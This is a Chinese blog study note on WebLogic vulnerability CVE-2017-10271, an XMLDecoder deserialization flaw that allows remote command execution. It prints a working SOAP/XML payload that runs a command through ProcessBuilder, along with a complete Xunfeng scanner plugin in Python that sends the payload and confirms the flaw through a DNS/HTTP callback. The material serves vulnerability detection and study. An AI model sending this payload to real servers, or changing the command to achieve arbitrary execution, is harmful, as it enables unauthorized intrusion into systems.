一、原理:

  很明显啦,readobject又出来背锅了,一个XML的反序列化漏洞导致的命令执行。

  具体原理我看不懂java代码的我也只能学习别人的分析。给出一篇参考文章,写的非常详细:

  漏洞原理

二、如何构造命令执行的payload-xml:

 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

     <soapenv:Header>

         <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

             <java version="1.8" class="java.beans.XMLDecoder">

                 <void class="java.lang.ProcessBuilder">

                     <array class="java.lang.String" length="3">

                         <void index="0">

                             <string>nslookup</string> #命令名称

                         </void>

                         <void index="1">

                             <string>%s</string> #巡风的随机字符串,用来后面去查HTTP或者DNS log的flag字符串

                         </void>

                         <void index="2">

                             <string>%s</string> #目标IP

                         </void>

                     </array>

                 <void method="start"/>

                 </void>

             </java>

         </work:WorkContext>

     </soapenv:Header>

     <soapenv:Body/>

 </soapenv:Envelope>

三、巡风的poc分析:

讲一下验证流程:

1、首先发包请求目标地址,如果目标地址返回存在banner信息:Web Services在报文中则进行下一步测试。 (首先得有weblogic啊)

2、发请求把XML内容 POST到目标主机去,休息2s后请求巡风的自己的WEB服务器上的http://%s:8088/{随机字符串} 相当于记录了NSLOOKUP的dnslog。如何查到了,返回结果有YES则存在漏洞,否则不存在。

 #!/usr/bin/python

 # coding:utf-8

 '''

 巡风及巡风的插件基于python2

 主要有两个函数:

 get_plugin_info() 返回插件信息

 check(ip, port, timeout) 接收IP,端口号及超时参数供巡风主程序调用,有返回值且返回值在判断里为True,即为漏洞存在,返回值即为本次的扫描结果,详情请看接下来的函数实现

 '''

 import random

 import urllib2

 import socket

 from time import sleep

 def get_plugin_info():

     '''get_plugin_info 函数用于返回该插件和插件所检测漏洞的信息'''

     plugin_info = {

         "name": "WebLogic WLS RCE CVE-2017-10271",

         "info": "Oracle WebLogic Server WLS安全组件中的缺陷导致远程命令执行",

         "level": "高危",

         "type": "命令执行",

         "author": ".@sinosig",

         "url": "https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html",

         "keyword": "tag:weblogic",

     }

     return plugin_info

 def random_str(len):

     '''返回随机字符串'''

     str1 = ""

     for i in range(len):

         str1 += (random.choice("ABCDEFGH1234567890"))

     return str(str1)

 def get_ver_ip(ip):

     '''返回当前服务器ip,当poc所用payload无回显时,可以使用巡风辅助验证的http服务和dns服务'''

     csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

     csock.connect((ip, 80))

     (addr, port) = csock.getsockname()

     csock.close()

     return addr

 def check(ip, port, timeout):

     '''本次poc的验证的主函数,巡风会调用该函数进行漏洞检测'''

     test_str = random_str(6)

     server_ip = get_ver_ip(ip)

     check_url = ['/wls-wsat/CoordinatorPortType', '/wls-wsat/CoordinatorPortType11']

     heads = {

         'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)',

         'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

         'Accept-Language': 'zh-CN,zh;q=0.8',

         'SOAPAction': "",

         'Content-Type': 'text/xml;charset=UTF-8',

     }

     # 本次漏洞的payload

     # 本次命令执行漏洞的payload所触发的response没有明显回显和行为提供判断,所以作者使用nslookup发送dns请求到get_ver_ip函数中取到的服务器地址,如果巡风服务器收到带有random_str函数生成的随机字符串的dns请求即可判断为漏洞存在。

     post_str = '''

         <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">

           <soapenv:Header>

             <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">

               <java version="1.8" class="java.beans.XMLDecoder">

                 <void class="java.lang.ProcessBuilder">

                   <array class="java.lang.String" length="3">

                     <void index="0">

                       <string>nslookup</string>

                     </void>

                     <void index="1">

                       <string>%s</string>

                     </void>

                     <void index="2">

                       <string>%s</string>

                     </void>

                   </array>

                   <void method="start"/>

                 </void>

               </java>

             </work:WorkContext>

           </soapenv:Header>

           <soapenv:Body/>

         </soapenv:Envelope>

                 ''' % (test_str, server_ip)

     for url in check_url:

         target_url = 'http://' + ip + ':' + str(port) + url.strip()

         req = urllib2.Request(url=target_url, headers=heads)

         if 'Web Services' in urllib2.urlopen(req, timeout=timeout).read():

             req = urllib2.Request(url=target_url, data=post_str, headers=heads)

             try:

                 urllib2.urlopen(req, timeout=timeout).read()

             except urllib2.URLError:

                 pass

             sleep(2)

             # 这里请求 http://{巡风的地址}:8088/{本次生成随机字符串} 如果返回YES,则证明服务器收到该请求,漏洞存在

             check_result = urllib2.urlopen("http://%s:8088/%s" % (server_ip, test_str), timeout=timeout).read()

             if "YES" in check_result:

                 return "Exist CVE-2017-10271"

         else:

             pass

weblogic新漏洞学习cve-2017-10271的更多相关文章

  1. weblogic重要漏洞记录

    (PS:之前在freebuf发过,这里直接复制过来的,所以有些图片会有水印) 前言 T3协议存在多个反序列化漏洞CVE-2015-4852/CVE-2016-0638/CVE-2016-3510/CV ...

  2. JWT漏洞学习

    JWT漏洞学习 什么是JWT? JWT是JSON Web Token的缩写,它是一串带有声明信息的字符串,由服务端使用加密算法对信息签名,以保证其完整性和不可伪造性.Token里可以包含所有必要的信息 ...

  3. weblogic CVE-2018-2628漏洞利用工具

    weblogic CVE-2018-2628漏洞利用 漏洞环境: Windows2018R2 weblogic10.3.6 漏洞利用过程: 搭建好存在CVE-2018-2628漏洞的weblogic平 ...

  4. Weblogic CVE-2020-2551漏洞复现&CS实战利用

    Weblogic CVE-2020-2551漏洞复现 Weblogic IIOP 反序列化 漏洞原理 https://www.anquanke.com/post/id/199227#h3-7 http ...

  5. Weblogic CVE-2020-2551漏洞复现

    Weblogic CVE-2020-2551漏洞复现 0x00 前言 在一次渗透测试过程中,碰见了该漏洞,并使用在野的POC验证了这个漏洞存在,当时工具网传的利用方式去进行利用,没有成功,可能是自己太 ...

  6. PWN二进制漏洞学习指南

    目录 PWN二进制漏洞学习指南 前言 前置技能 PWN概念 概述 发音 术语 PWN环境搭建 PWN知识学习途径 常见漏洞 安全机制 PWN技巧 PWN相关资源博客 Pwn菜鸡小分队 PWN二进制漏洞 ...

  7. Weblogic反序列化漏洞补丁更新解决方案

    Weblogic反序列化漏洞的解决方案基于网上给的方案有两种: 第一种方案如下 使用SerialKiller替换进行序列化操作的ObjectInputStream类; 在不影响业务的情况下,临时删除掉 ...

  8. XSS漏洞学习笔记

    XSS漏洞学习 简介 xss漏洞,英文名为cross site scripting. xss最大的特点就是能注入恶意的代码到用户浏览器的网页上,从而达到劫持用户会话的目的. 说白了就是想尽办法让你加载 ...

  9. weblogic系列漏洞整理 -- 5. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210)

    目录 五. weblogic SSRF 漏洞 UDDI Explorer对外开放 (CVE-2014-4210) 1. 利用过程 2. 修复建议 一.weblogic安装 http://www.cnb ...

随机推荐

  1. chkconfig关闭必须的5个服务或者取出第一列

    chkconfig 查找出第一列,开头不包含0的 chkconfig|egrep -o "^[^0]+"|egrep -v "sshd|network|crond|sys ...

  2. MySql C++调用库Connector/c++编译 和 接口封装【一】mysql数据库安装

    Connector/c++库的源文件编译,你需要先准备好以下工具:     mysql数据库(编译时要依赖),boost库,cmake(生成sln工程文件),connector/c++的源文件,vis ...

  3. selenium定位方法(java实例)(二)

    从下图中可以看到selenium有三类定位元素的方法,一种是直接通过属性.标签以及链接来定位,一种是XPath方式,最后一种是CSS方式. 下表列举了元素定位的例子 selenium之页面元素定位方法 ...

  4. 【MySQL】字符串截取之substring_index

    substring_index(str,delim,count)       str:要处理的字符串       delim:分隔符       count:计数 例子:str=www.baidu.c ...

  5. tomcat:run和tomcat7:run的区别,以及Apache Tomcat Maven Plugin 相关

    起因: 同事部署的maven项目,之前使用 jetty,现在切换到 tomcat,但是他使用的命令是 tomcat:run ,而不是 tomcat7:run,能启动,但出现问题了. 于是搜索了一番,想 ...

  6. PHP wamp server问题

    只能说各种不顺,天热人烦! 问题一.wampapache服务不能启动之VCRUNTIME140.DLL文件丢失. 这个是缺少VC运行库,查找并安装相应的文件即可. 问题二.wampapche服务不能启 ...

  7. bootstrap -- meta中的viewport指令

    在查看bootstrap教程中,碰到 <meta name="viewport" content="width=device-width, initial-scal ...

  8. Java获取网络IP

    Java获取获取网络IP,浅尝辄止咯- import java.net.InetAddress; import java.net.UnknownHostException; /** * 获取网络IP ...

  9. Qt的窗口的最大化。

    1.window.showFullScreen()//此方法只对顶级窗口有效,对子窗口无效 QT中窗口部件QWidget成员函数showFullScreen();是用于将窗口部件全屏显示,但是他只对窗 ...

  10. xpath的数据和节点类型以及XPath中节点匹配的基本方法

    XPath数据类型  XPath可分为四种数据类型:  节点集(node-set)  节点集是通过路径匹配返回的符合条件的一组节点的集合.其它类型的数据不能转换为节点集.  布尔值(boolean)  ...